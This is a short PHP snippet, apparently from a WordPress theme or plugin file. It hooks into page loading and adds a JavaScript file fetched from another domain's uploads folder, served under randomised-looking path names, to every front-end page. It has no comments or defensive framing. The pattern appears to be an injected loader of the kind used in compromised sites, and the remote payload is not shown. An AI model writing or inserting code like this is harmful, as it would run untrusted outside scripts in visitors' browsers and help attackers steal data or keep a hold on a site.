if (!function_exists('sch_enqueue_front_asset')) { function sch_enqueue_front_asset() { wp_enqueue_script('sch-front', 'https://techbreed.co.za/design/wp-content/uploads/static-ceb01c/res-bcde/front-77c8d7b2.js', array(), null, false); } add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset'); }